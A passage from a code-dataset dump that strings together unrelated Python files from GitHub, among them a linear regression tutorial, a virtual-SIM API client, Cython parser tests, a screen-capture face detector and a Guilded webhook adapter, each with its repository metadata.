y_train, y_test = train_test_split(X, y, test_size = 1/3, random_state = 0)\n\n#Fitting the linear regression model to teh training set\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n#Predicting the Test set results\ny_prediciton = regressor.predict(X_test)\n\n#Visualizing the training set\nplt.scatter(X_train, y_train, color = 'red')\nplt.plot(X_train, regressor.predict(X_train), color = 'blue')\nplt.title('Salary vs Experince (Training Set)')\nplt.xlabel('Years of Experince')\nplt.ylabel('Salary')\nplt.show()\n\n#Visualizing the test set\nplt.scatter(X_test, y_test, color = 'red')\nplt.plot(X_train, regressor.predict(X_train), color = 'blue')\nplt.title('Salary vs Experince (Test Set)')\nplt.xlabel('Years of Experince')\nplt.ylabel('Salary')\nplt.show()","repo_name":"ParthJhunjhunwala/Machine-Learning-Concepts","sub_path":"Regression/Linear Regression/simple_linear_regression_me.py","file_name":"simple_linear_regression_me.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38356155279","text":"from PanjSim.user.user import User\nfrom PanjSim.products.products import Products\nfrom PanjSim.purchase.purchase import Purchase\nfrom PanjSim.http_client import HttpClient\nfrom typing import Any\n\n\n\n\nclass PanjSim:\n \n def __init__(self,api_key:str,proxy:dict|None=None) -> None:\n self.session=HttpClient(api_key,proxy)\n \n \n def User(self):\n return User(self.session)\n \n \n def Products(self):\n return Products(self.session)\n \n \n def Purchase(self):\n return Purchase(self.session)\n \n def get_countries_list(self) -> list[dict[str, Any]]:\n '''\n\n { \n 'afghanistan': \n {'iso': {'af': 1}, 'prefix': {'+93': 1}, 'text_en': 'Afghanistan', 'text_ru': 'Афганистан', 'virtual21': {'activation': 1}, 'virtual23': {'activation': 1}, 'virtual32': {'activation': 1}, 'virtual35': {'activation': 1}, 'virtual4': {'activation': 1}},\n \n 'albania': \n {'iso': {'al': 1}, 'prefix': {'+355': 1}, 'text_en': 'Albania', 'text_ru': 'Албания', 'virtual21': {'activation': 1}, 'virtual23': {'activation': 1}, 'virtual32': {'activation': 1}, 'virtual4': {'activation': 1}},\n ....\n }\n \n '''\n endpoint = \"/v1/guest/countries\"\n \n\n response = self.session.get(endpoint)\n return response.json()\n \n def get_notification(self,lang:str) -> dict[str, Any]:\n '* lang: Language of notification, ru/en'\n endpoint = f\"/v1/guest/flash/{lang}\"\n response = self.session.get(endpoint)\n return response.json()\n def find_low_price(self,product:str,limit:int=10,available:int=1) -> dict|list:\n '''\n * if limit = 1 return dict low country price else return cost list\n + return {'cost': 8.4, 'count': 2741, 'rate': 6.84, 'contry': 'india', 'operator': 'virtual4'}\n + or: \n + return [{'cost': 8.4, 'count': 2741, 'rate': 6.84, 'contry': 'india', 'operator': 'virtual4'}]\n '''\n product_price=self.Products().get_prices(product=product)\n product_price_data=product_price.get(product)\n \n new=[]\n \n for k in product_price_data:\n v=product_price_data[k]\n nv=[]\n for x,y in v.items():\n \n if y['count'] >= available:\n nv.append((x,y))\n\n \n _sorted = sorted(nv, key=lambda x:x[1].get('cost'))\n if _sorted:\n dat=_sorted[0][1]\n dat['contry']=k\n dat['operator']=_sorted[0][0]\n new.append(dat)\n \n _sorted = sorted(new, key=lambda x:x.get('cost'))\n \n \n return _sorted[:limit] if limit > 1 else _sorted[0]","repo_name":"abbas-bachari/PanjSim","sub_path":"PanjSim/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42104121457","text":"'''Tests on classes/structs.'''\n\nimport unittest\n\nfrom .utils import _code_runner, _code_run_single_class\n\n\nclass TestStructs(unittest.TestCase):\n\n def setUp(self):\n self.tagName = 'struct'\n self.is_class = False\n\n def test_declaration(self):\n s = _code_run_single_class(f'{self.tagName} MyStruct;')\n if self.tagName == 'struct':\n self.assertTrue(s.is_struct)\n else:\n self.assertFalse(s.is_struct)\n self.assertEqual(s.name, 'MyStruct')\n\n def test_only_trivial_ctor(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n ' MyStruct() {}',\n '};',\n ])\n self.assertEqual(len(s.methods), 1)\n self.assertTrue(s.methods[0].is_ctor)\n self.assertEqual(len(s.methods[0].function.params), 0)\n\n def test_ctor(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n ' MyStruct(int a, double& b, const float c) {}',\n '};',\n ])\n self.assertEqual(len(s.methods), 1)\n self.assertTrue(s.methods[0].is_ctor)\n ctor = s.methods[0].function\n self.assertEqual(len(ctor.params), 3)\n self.assertEqual(ctor.params[0].name, 'a')\n self.assertTrue(ctor.params[1].type.is_ref)\n self.assertTrue(ctor.params[2].type.is_const)\n\n def test_dtor(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n ' ~MyStruct()=default;',\n '};',\n ])\n # ignore destructors\n self.assertEqual(len(s.methods), 0)\n\n def test_inheritance(self):\n ns = _code_runner([\n f'{self.tagName} Base {{ }};',\n f'{self.tagName} Child : Base {{ }};',\n ])\n self.assertTrue(len(ns.children), 2)\n b, c = ns.children[0], ns.children[1]\n self.assertEqual(len(b.bases), 0)\n self.assertEqual(len(c.bases), 1)\n self.assertEqual(c.bases[0], 'Base')\n\n def test_inheritance_from_different_namespace(self):\n ns = _code_runner([\n f'namespace ns {{ {self.tagName} Base {{ }}; }}',\n 'struct Child : ns::Base {};',\n ])\n b = ns.children[0].children[0]\n c = ns.children[1]\n self.assertEqual(len(b.bases), 0)\n self.assertEqual(len(c.bases), 1)\n self.assertEqual(c.bases[0], 'ns::Base')\n\n def test_removal_of_implicit_functions_from_virtual(self):\n with self.assertWarns(UserWarning):\n s = _code_run_single_class([\n f'{self.tagName} VirtTest {{',\n 'public:'*self.is_class,\n ' virtual int myVirtMethod() { return 0; }',\n '};',\n ])\n # Make sure that implicitly generated methods from the virtual\n # function are not included\n self.assertEqual(len(s.methods), 1)\n\n def test_only_private_methods(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'private:',\n ' void mypriv();',\n ' int mypriv2();',\n ' double mypriv3();',\n ' MyStruct* mypriv4();',\n '};',\n ])\n self.assertEqual(len(s.methods), 0)\n\n def test_protected_methods(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'protected:',\n ' void myprot();',\n ' int myprot2();',\n ' double myprot3();',\n ' MyStruct* myprot4();',\n '};',\n ])\n self.assertEqual(len(s.methods), 0)\n\n def test_mixture_public_protected_private_methods(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'private:',\n ' void mypriv();',\n 'public:',\n ' int mypub();',\n 'private:',\n ' double mypriv2();',\n 'public:',\n ' MyStruct* mypub2();',\n 'protected:',\n ' short myprot();',\n '};',\n ])\n self.assertEqual(len(s.methods), 2)\n self.assertEqual(s.methods[0].function.name, 'mypub')\n self.assertEqual(s.methods[1].function.name, 'mypub2')\n\n def test_class_template(self):\n s = _code_run_single_class([\n 'template<class T>',\n f'{self.tagName} MyStruct {{',\n '};',\n ])\n self.assertEqual(len(s.templateparams), 1)\n self.assertEqual(s.templateparams[0].name, 'T')\n self.assertEqual(s.templateparams[0].tag_used, 'class')\n\n def test_typename_template(self):\n s = _code_run_single_class([\n 'template<typename T>',\n f'{self.tagName} MyStruct {{',\n '};',\n ])\n self.assertEqual(s.templateparams[0].tag_used, 'typename')\n\n def test_nontype_template(self):\n with self.assertWarns(UserWarning), self.assertRaises(ValueError):\n s = _code_run_single_class([\n 'template<int N>',\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n ' double myArray[N];',\n '};',\n ])\n # Cython does not support nontype templates! Should be no params\n self.assertEqual(len(s.templateparams), 0)\n\n def test_default_template(self):\n s = _code_run_single_class([\n 'template<class T, class U, class V = double&>',\n f'{self.tagName} MyStruct {{ }};',\n ])\n self.assertEqual(s.templateparams[0].default, None)\n self.assertEqual(s.templateparams[1].default, None)\n self.assertEqual(s.templateparams[2].default.name, 'double')\n self.assertTrue(s.templateparams[2].default.is_ref)\n\n def test_template_parameter_pack(self):\n s = _code_run_single_class([\n 'template<class T, class ... Types>',\n f'{self.tagName} MyStruct {{ }};',\n ])\n self.assertFalse(s.templateparams[0].is_parameter_pack)\n self.assertTrue(s.templateparams[1].is_parameter_pack)\n\n def test_unnamed_template_parameter_pack(self):\n s = _code_run_single_class([\n 'template<class T, typename...>',\n f'{self.tagName} MyStruct {{ }};',\n ])\n self.assertFalse(s.templateparams[0].is_parameter_pack)\n self.assertTrue(s.templateparams[1].is_parameter_pack)\n self.assertEqual(s.templateparams[1].name, None)\n\n def test_nested_templates(self):\n with self.assertWarns(UserWarning), self.assertRaises(ValueError):\n s = _code_run_single_class([\n 'template <class SomeType, template <class> class OtherType>',\n f'{self.tagName} NestedTemplateStruct {{',\n 'public:'*self.is_class,\n ' OtherType<SomeType> f;',\n '};',\n ])\n # template-template parameters are currently not supported\n self.assertEqual(len(s.templateparams), 1)\n\n def test_templated_methods(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n ' template<class T, typename U, class V = double *const>',\n ' void myfun(T t, U u, V v);'\n '};',\n ])\n m = s.methods[0].function\n self.assertEqual(m.templateparams[0].name, 'T')\n self.assertEqual(m.templateparams[0].tag_used, 'class')\n self.assertEqual(m.templateparams[1].name, 'U')\n self.assertEqual(m.templateparams[1].tag_used, 'typename')\n self.assertEqual(m.templateparams[2].name, 'V')\n self.assertEqual(m.templateparams[2].tag_used, 'class')\n self.assertEqual(m.templateparams[2].default.name, 'double')\n self.assertTrue(m.templateparams[2].default.is_const_ptr)\n\n def test_nested_class(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n f' {self.tagName} MyInnerStruct {{}};',\n '};',\n ])\n self.assertEqual(s.name, 'MyStruct')\n self.assertEqual(len(s.children), 1)\n self.assertEqual(s.children[0].name, 'MyInnerStruct')\n\n def test_curiously_recurring_template_pattern(self):\n pass\n\n def test_typedef(self):\n '''make a typedef inside a struct/class'''\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n ' typedef int myInt;',\n '};',\n ])\n self.assertEqual(len(s.typedefs), 1)\n td = s.typedefs[0]\n self.assertEqual(td.name, 'myInt')\n self.assertEqual(td.type.name, 'int')\n\n def test_data_member_modifiers(self):\n '''Create public data members with various modifiers.'''\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n ' int myInt;',\n ' int & myInt_ref;',\n ' int // some comment here',\n '* myInt_star;',\n ' const int /* this is obtrusive */ const_myInt;',\n ' int *',\n 'const // this is a const ptr, not const val',\n 'myInt_star_const',\n ';',\n '};',\n ])\n self.assertEqual(s.fields[0].name, 'myInt')\n self.assertEqual(s.fields[1].name, 'myInt_ref')\n self.assertTrue(s.fields[1].type.is_ref)\n self.assertEqual(s.fields[2].name, 'myInt_star')\n self.assertTrue(s.fields[2].type.is_ptr)\n self.assertEqual(s.fields[3].name, 'const_myInt')\n self.assertTrue(s.fields[3].type.is_const)\n self.assertEqual(s.fields[4].name, 'myInt_star_const')\n self.assertTrue(s.fields[4].type.is_ptr)\n self.assertTrue(s.fields[4].type.is_const_ptr)\n\n # def test_templated_data_members(self):\n # ns = _code_runner([\n # 'template<class U>',\n # f'{self.tagName} T {{ }};',\n # '',\n # f'{self.tagName} MyStructI {{',\n # 'public:'*self.is_class,\n # ' T<int> myInt;',\n # ' T<int&> myInt_ref;',\n # ' T<int*> myInt_star;',\n # ' T<const int> const_myInt;',\n # ' T<int *const> myInt_star_const;',\n # '};',\n # ])\n # print(ns)\n\n\nclass TestClasses(TestStructs):\n def setUp(self):\n self.tagName = 'class'\n self.is_class = True\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"mckib2/cythonator","sub_path":"tests/test_classes.py","file_name":"test_classes.py","file_ext":"py","file_size_in_byte":10681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11560747798","text":"with open ('words.txt','r') as wl:\r\n w = wl.read().split(' ')\r\ni = len(w)\r\nwhile ( i > 0 ):\r\n sb = 0\r\n sg = 0\r\n for x in w[i-1]:\r\n if ( x == 'r' or x == 'R' or x == 'f' or x == 'F' or x =='c' or x == 'C' or x == 'k' or x== 'K' ):\r\n sb += 1\r\n elif ( x == 'a' or x == 'A' or x == 'e' or x == 'E' or x == 'i' or x == 'I' or x == 'o' or x == 'O' or x == 'u' or x == 'U' or x == 'y' or x == 'Y' ):\r\n #Εδώ υπάρχει το παράδοξο πως το y καμία φορά θεωρε��ται και σύμφωνο αλλά έπρεπε κάπου να το κατατάξω οπότε το έβαλα στα φωνήεντα...\r\n sb = sb #ξέρω οτι αυτό δεν κάνει τ'ιποτα αλλά δεν ήθελα να το αφήσω κενό XD\r\n else:\r\n sg += 1\r\n if ( sg >= sb ):\r\n w[i-1] = \"good\"\r\n else:\r\n w[i-1] = \"bad\"\r\n i = i - 1 \r\nprint(w) \r\n \r\n","repo_name":"Awott/PythPats","sub_path":"ask2.py","file_name":"ask2.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16199219711","text":"import torch.nn as nn\nfrom ..utils import clones\nfrom ..layers import LayerNorm, SublayerConnection\n\n\nclass Encoder(nn.Module):\n \"Transformer encoder core which is the general logic + a stack of N layers\"\n\n def __init__(self, layer, N):\n \"\"\"\n :param layer: depth one Transformer logic\n :param N: Depth of Transformer\n \"\"\"\n super(Encoder, self).__init__()\n self.layers = clones(layer, N)\n self.norm = LayerNorm(layer.size)\n\n def forward(self, x, mask):\n \"Pass the input (and mask) through each layer in turn.\"\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)\n\n\nclass EncoderLayer(nn.Module):\n \"Encoder is made up of self-attn and feed forward (defined below)\"\n\n def __init__(self, size, self_attn, feed_forward, dropout):\n \"\"\"\n :param size: model dimensionality\n :param self_attn: self attention layer\n :param feed_forward: feed forward layer\n :param dropout: probability dropout\n \"\"\"\n super(EncoderLayer, self).__init__()\n self.self_attn = self_attn\n self.feed_forward = feed_forward\n self.sublayer = clones(SublayerConnection(size, dropout), 2)\n self.size = size # d_model\n\n def forward(self, x, mask):\n \"\"\"\n Masked forward pass\n\n :param x: input\n :param mask: attention mask\n :return: model output\n \"\"\"\n x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, mask))\n return self.sublayer[1](x, self.feed_forward)\n","repo_name":"MischaD/Benchmarking-Univariate-Time-Series-Prediction","sub_path":"src/models/transformer/encoder/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"28109423291","text":"from mss import mss\nimport numpy as np\nimport cv2\nimport time\nimport pprint\n\n\nclass Recorder:\n # constructor\n def __init__(self):\n self.fps = 30 # define fps for recording\n self.screen_shot = None\n self.monitor = None\n self.face_img_map = {}\n self.face_number = 0\n # save for memory conservation\n with mss() as screen_shot:\n self.screen_shot = screen_shot\n self.monitor = screen_shot.monitors[1]\n # for Cascade-classifier\n self.path_cascade = \"./etc/cascades/haarcascade_frontalface_default.xml\"\n self.face_cascade = cv2.CascadeClassifier(self.path_cascade)\n\n # return image as array\n # image can be shown by using \"cv2.imshow\" directly\n def record(self):\n return np.array(self.screen_shot.grab(self.monitor))\n\n # to reduce memory comsumpution and keep overall view\n def resize_image(self, raw_img):\n height = raw_img.shape[0]\n width = raw_img.shape[1]\n return cv2.resize(raw_img, (96, 96))\n\n # clip faces, using Haar-like feature\n def detect_face(self, raw_img):\n # input_size of the model based on AffectNet is: 3 x 96 x 96\n faces = self.face_cascade.detectMultiScale(raw_img, minSize=(256, 256))\n # if faces are not detected, return\n self.face_number = len(faces)\n if self.face_number == 0:\n return\n # process for each face\n for i, face in enumerate(faces):\n x, y, w, h = face\n self.face_img_map[\"face_img_\" +\n str(i)] = raw_img[y: y + h, x: x + w]\n\n def show_as_video(self):\n while True:\n # common process: get image, delete image,\n # resize image, and detect image\n # get image and show it\n raw_img = self.record()\n # cv2.imshow(\"preview_raw\", raw_img)\n # detect faces\n self.detect_face(raw_img)\n # delete unused set of map\n img_map_number = len(self.face_img_map)\n for i in range(img_map_number - self.face_number):\n target_number = self.face_number + i\n del self.face_img_map[\"face_img_\" + str(target_number)]\n cv2.destroyWindow(\"preview_\" + str(target_number))\n # process for each faces\n for i, img_key in enumerate(self.face_img_map):\n img = self.resize_image(self.face_img_map[img_key])\n # if you want to preview each face image, activate\n cv2.imshow(\"preview_\" + str(i), img)\n\n # show overview image\n print(self.face_img_map.keys())\n # if ESC is pressed, break and destroy window\n if cv2.waitKey(1) == 27:\n break\n time.sleep(1 / self.fps) # wait to avoid over running\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n recorder = Recorder()\n recorder.show_as_video()\n","repo_name":"WakishiDeer/display_recorder","sub_path":"display_record_face.py","file_name":"display_record_face.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70543596733","text":"import argparse\nimport glob\nimport json\nimport logging\nimport multiprocessing as mproc\nimport os\nimport sys\nfrom functools import partial\n\nimport numpy as np\nfrom imsegm.utilities.data_io import update_path\nfrom imsegm.utilities.experiments import WrapExecuteSequence\nfrom scipy.ndimage import filters\n\nsys.path += [os.path.abspath('.'), os.path.abspath('..')] # Add path to root\nfrom bpdl.data_utils import export_image, load_image\nfrom bpdl.utilities import estimate_rolling_ball\n\nNB_WORKERS = int(mproc.cpu_count() * .75)\nNAME_JSON_BBOX = 'cut_bounding_box.json'\nLOAD_SUBSET_COEF = 5\nMETHODS = ['cum-info', 'line-sum', 'line-grad']\nDEFAULT_PARAMS = {\n 'path_in': os.path.join(update_path('data_images'), 'imaginal_discs', 'gene', '*.png'),\n 'path_out': os.path.join(update_path('data_images'), 'imaginal_discs', 'gene_cut'),\n}\n\n\ndef args_parse_params(params):\n \"\"\" create simple arg parser with default values (input, output)\n\n :param dict dict_params:\n :return obj: object argparse<...>\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-i',\n '--path_in',\n type=str,\n required=True,\n default=params['path_in'],\n help='path to the folder with input image dataset'\n )\n parser.add_argument(\n '-o',\n '--path_out',\n type=str,\n required=True,\n default=params['path_out'],\n help='path to the output with experiment results'\n )\n parser.add_argument(\n '-t', '--threshold', type=float, required=False, default=0.001, help='threshold for image information'\n )\n parser.add_argument(\n '-m', '--thr_method', type=str, required=False, default='', choices=METHODS, help='used methods'\n )\n parser.add_argument(\n '--nb_workers', type=int, required=False, default=NB_WORKERS, help='number of parallel processes'\n )\n\n args = vars(parser.parse_args())\n for k in (k for k in args if k.startswith('path_')):\n p = update_path(os.path.dirname(args[k]))\n assert os.path.exists(p), 'missing (%s): %s' % (k, p)\n args[k] = os.path.join(p, os.path.basename(args[k]))\n return args\n\n\ndef load_mean_image(paths_img):\n img_cum = None\n for p_img in paths_img:\n _, img = load_image(p_img, fuzzy_val=True)\n img = img.astype(np.float64)\n if img_cum is None:\n img_cum = img\n else:\n img_cum = img_cum + img\n img_mean = img_cum / float(len(paths_img))\n return img_mean\n\n\ndef check_bounding_box(bbox, img_size):\n for i in range(2):\n # if left cut is over right cut reset it\n if bbox[i] > (img_size[i] - bbox[i + 2]):\n logging.debug('reset BBox (%i, %i) for size %i', bbox[i], bbox[i + 2], img_size[i])\n bbox[i] = 0\n bbox[i + 2] = 0\n return bbox\n\n\ndef find_min_bbox_cumul_sum(img, threshold=0):\n logging.info('find bbox using cumulative info with thr=%f', threshold)\n img_norm = img / np.sum(img)\n bbox = []\n for _ in range(4):\n rows = np.sum(img_norm, axis=0)\n for i, _ in enumerate(rows):\n if np.sum(rows[:i]) >= threshold:\n bbox.append(i)\n break\n img_norm = np.rot90(img_norm)\n return bbox\n\n\ndef find_min_bbox_line_sum(img, threshold=0):\n logging.info('find bbox using line sum with thr=%f', threshold)\n bbox = []\n for _ in range(4):\n rows = np.mean(img, axis=0)\n rows = rows / np.max(rows)\n for i, r in enumerate(rows):\n if r >= threshold:\n bbox.append(i)\n break\n img = np.rot90(img)\n return bbox\n\n\ndef find_min_bbox_grad(img):\n logging.info('find bbox using Gradient')\n bbox = []\n for _ in range(4):\n rows = np.mean(img, axis=0)\n rows_cum = np.cumsum(rows / np.sum(rows))\n rows_cum = filters.gaussian_filter1d(rows_cum, sigma=1)\n\n pts = np.array(list(zip(range(len(rows_cum)), rows_cum)))\n diams = estimate_rolling_ball(pts, tangent_smooth=1)\n bbox.append(np.argmin(diams[0]))\n\n img = np.rot90(img)\n return bbox\n\n\ndef export_bbox_json(path_dir, bbox, name=NAME_JSON_BBOX):\n d_bbox = dict(zip(['left', 'top', 'right', 'bottom'], bbox))\n path_json = os.path.join(path_dir, name)\n logging.info('exporting JSON: %s', path_json)\n with open(path_json, 'w') as fp:\n json.dump(d_bbox, fp)\n return d_bbox\n\n\ndef export_cut_image(path_img, d_bbox, path_out):\n name, im = load_image(path_img)\n im_cut = im[d_bbox['top']:-d_bbox['bottom'], d_bbox['left']:-d_bbox['right']]\n export_image(path_out, im_cut, name)\n\n\ndef main(path_pattern_in, path_out, nb_workers=NB_WORKERS):\n assert os.path.isdir(os.path.dirname(path_pattern_in)), 'missing: %s' % path_pattern_in\n assert os.path.isdir(os.path.dirname(path_out)), 'missing: %s' % os.path.dirname(path_out)\n\n if not os.path.isdir(path_out):\n logging.info('create dir: %s', path_out)\n os.mkdir(path_out)\n\n list_img_paths = glob.glob(path_pattern_in)\n logging.info('found images: %i', len(list_img_paths))\n\n # create partial subset with image pathes\n list_img_paths_partial = [\n list_img_paths[i::nb_workers * LOAD_SUBSET_COEF] for i in range(nb_workers * LOAD_SUBSET_COEF)\n ]\n list_img_paths_partial = [ls for ls in list_img_paths_partial if ls]\n mean_imgs = list(\n WrapExecuteSequence(load_mean_image, list_img_paths_partial, nb_workers=nb_workers, desc='loading mean images')\n )\n # imgs, im_names = tl_data.dataset_load_images(list_img_paths, nb_workers=1)\n img_mean = np.mean(np.asarray(mean_imgs), axis=0)\n export_image(path_out, img_mean, 'mean_image')\n\n logging.info('original image size: %r', img_mean.shape)\n # bbox = find_min_bbox_cumul_sum(img_mean, params['threshold'])\n if params['thr_method'] == 'line-grad':\n bbox = find_min_bbox_grad(img_mean)\n elif params['threshold'] == 0:\n bbox = [0] * 4\n elif params['thr_method'] == 'line-sum':\n bbox = find_min_bbox_line_sum(img_mean, params['threshold'])\n else:\n bbox = find_min_bbox_cumul_sum(img_mean, params['threshold'])\n d_bbox = export_bbox_json(path_out, bbox)\n logging.info('found BBox: %r', d_bbox)\n\n _cut_export = partial(export_cut_image, d_bbox=d_bbox, path_out=path_out)\n list(WrapExecuteSequence(_cut_export, list_img_paths, nb_workers, desc='exporting cut images'))\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n logging.info('running...')\n\n params = args_parse_params(DEFAULT_PARAMS)\n main(params['path_in'], params['path_out'], nb_workers=params['nb_workers'])\n\n logging.info('DONE')\n","repo_name":"Borda/pyBPDL","sub_path":"experiments/run_cut_minimal_images.py","file_name":"run_cut_minimal_images.py","file_ext":"py","file_size_in_byte":6690,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"33742116575","text":"from __future__ import annotations\nimport io\n\nimport logging\nimport asyncio\nimport json\nimport re\n\nfrom typing import TYPE_CHECKING, Any, Dict, List, Optional, Sequence, Tuple, Union\nfrom contextvars import ContextVar\n\nimport aiohttp\n\nfrom .. import utils\nfrom ..channel import ChatChannel, ListChannel\nfrom ..enums import FileType, MediaType\nfrom ..errors import HTTPException, Forbidden, NotFound, GuildedServerError\nfrom ..message import ChatMessage\nfrom ..user import Member, User\nfrom ..utils import ISO8601, find\nfrom ..asset import Asset\nfrom ..http import Route, UserbotRoute, handle_message_parameters\nfrom ..file import File\n\n__all__ = (\n 'Webhook',\n 'WebhookMessage',\n)\n\nlog = logging.getLogger(__name__)\n\nif TYPE_CHECKING:\n from ..abc import TeamChannel\n from ..http import HTTPClient\n from ..embed import Embed\n from ..team import Team\n import datetime\n\n from ..types.webhook import Webhook as WebhookPayload\n\nMISSING = utils.MISSING\n\n\nclass AsyncWebhookAdapter:\n async def request(\n self,\n route: Union[UserbotRoute, Route],\n session: aiohttp.ClientSession,\n webhook_id: str,\n *,\n payload: Optional[Dict[str, Any]] = None,\n multipart: Optional[List[Dict[str, Any]]] = None,\n files: Optional[List[File]] = None,\n auth_token: Optional[str] = None,\n params: Optional[Dict[str, Any]] = None,\n userbot: bool = None,\n ) -> Any:\n headers: Dict[str, str] = {}\n files = files or []\n to_send: Optional[Union[str, aiohttp.FormData]] = None\n\n if auth_token is not None:\n if userbot is None:\n raise ValueError('userbot must be provided if auth_token is also provided.')\n\n if userbot:\n headers['guilded-client-id'] = auth_token\n headers['cookie'] = f'guilded_mid={auth_token}'\n else:\n headers['Authorization'] = f'Bearer {auth_token}'\n\n if payload is not None:\n headers['Content-Type'] = 'application/json'\n to_send = json.dumps(payload)\n\n response: Optional[aiohttp.ClientResponse] = None\n data: Optional[Union[Dict[str, Any], str]] = None\n method = route.method\n url = route.url\n\n for attempt in range(5):\n for file in files:\n file.reset(seek=attempt)\n\n if multipart:\n form_data = aiohttp.FormData(quote_fields=False)\n for p in multipart:\n form_data.add_field(**p)\n to_send = form_data\n\n try:\n async with session.request(method, url, data=to_send, headers=headers, params=params) as response:\n log.debug(\n 'Webhook ID %s with %s %s has returned status code %s',\n webhook_id,\n method,\n url,\n response.status,\n )\n data = (await response.text(encoding='utf-8')) or None\n if data and response.headers['Content-Type'] == 'application/json':\n data = json.loads(data)\n\n if 300 > response.status >= 200:\n return data\n\n if response.status == 429:\n if not response.headers.get('Via'):\n raise HTTPException(response, data)\n\n retry_after: float\n try:\n retry_after = float(data['retry_after'])\n except (KeyError, TypeError):\n retry_after = 3.0\n\n log.warning('Webhook ID %s is rate limited. Retrying in %.2f seconds', webhook_id, retry_after)\n await asyncio.sleep(retry_after)\n continue\n\n if response.status >= 500:\n await asyncio.sleep(1 + attempt * 2)\n continue\n\n if response.status == 403:\n raise Forbidden(response, data)\n elif response.status == 404:\n raise NotFound(response, data)\n else:\n raise HTTPException(response, data)\n\n except OSError as e:\n if attempt < 4 and e.errno in (54, 10054):\n await asyncio.sleep(1 + attempt * 2)\n continue\n raise\n\n if response:\n if response.status >= 500:\n raise GuildedServerError(response, data)\n raise HTTPException(response, data)\n\n raise RuntimeError('Unreachable code in HTTP handling.')\n\n def get_webhook(\n self,\n server_id: str,\n webhook_id: str,\n *,\n auth_token: str,\n userbot: bool,\n session: aiohttp.ClientSession,\n ):\n if userbot:\n route = UserbotRoute('GET', f'/teams/{server_id}/members')\n else:\n route = Route('GET', f'/servers/{server_id}/webhooks/{webhook_id}')\n\n return self.request(route, session, webhook_id, auth_token=auth_token, userbot=userbot)\n\n def get_webhook_details(\n self,\n server_id: str,\n webhook_id: str,\n *,\n auth_token: str,\n session: aiohttp.ClientSession,\n ):\n # This method is intentionally limited so that it fits the \"model\" of single-entity operations here.\n\n route = UserbotRoute('POST', f'/teams/{server_id}/webhooks/detail')\n payload = {\n 'webhookIds': [webhook_id],\n }\n return self.request(route, session, webhook_id, payload=payload, auth_token=auth_token, userbot=True)\n\n def delete_webhook(\n self,\n server_id: str,\n webhook_id: str,\n *,\n auth_token: str,\n userbot: bool,\n session: aiohttp.ClientSession,\n ):\n if userbot:\n route = UserbotRoute('DELETE', f'/webhooks/{webhook_id}')\n else:\n route = Route('DELETE', f'/servers/{server_id}/webhooks/{webhook_id}')\n\n return self.request(route, session, webhook_id, auth_token=auth_token, userbot=userbot)\n\n def update_webhook(\n self,\n server_id: str,\n webhook_id: str,\n payload: Dict[str, Any],\n *,\n auth_token: str,\n userbot: bool,\n session: aiohttp.ClientSession,\n ):\n if userbot:\n route = UserbotRoute('PUT', f'/webhooks/{webhook_id}')\n else:\n route = Route('PUT', f'/servers/{server_id}/webhooks/{webhook_id}')\n\n return self.request(route, session, webhook_id, payload=payload, auth_token=auth_token, userbot=userbot)\n\n def execute_webhook(\n self,\n webhook_id: str,\n token: str,\n *,\n session: aiohttp.ClientSession,\n payload: Optional[Dict[str, Any]] = None,\n multipart: Optional[List[Dict[str, Any]]] = None,\n files: Optional[List[File]] = None,\n ):\n route = UserbotRoute('POST', f'/webhooks/{webhook_id}/{token}', override_base=UserbotRoute.MEDIA_BASE)\n return self.request(route, session, webhook_id, payload=payload, multipart=multipart, files=files)\n\n def delete_channel_message(\n self,\n webhook_id: str,\n channel_id: str,\n message_id: str,\n *,\n auth_token: str,\n userbot: bool,\n session: aiohttp.ClientSession,\n ):\n cls = UserbotRoute if userbot else Route\n route = cls('DELETE', f'/channels/{channel_id}/messages/{message_id}')\n return self.request(route, session, webhook_id, auth_token=auth_token, userbot=userbot)\n\n def get_channel_message(\n self,\n webhook_id: str,\n channel_id: str,\n message_id: str,\n *,\n auth_token: str,\n userbot: bool,\n session: aiohttp.ClientSession,\n ):\n if userbot:\n route = UserbotRoute('GET', f'/content/route/metadata?route=//channels/{channel_id}/chat?messageId={message_id}')\n else:\n route = Route('GET', f'/channels/{channel_id}/messages/{message_id}')\n return self.request(route, session, webhook_id, auth_token=auth_token, userbot=userbot)\n\n\nasync_context: 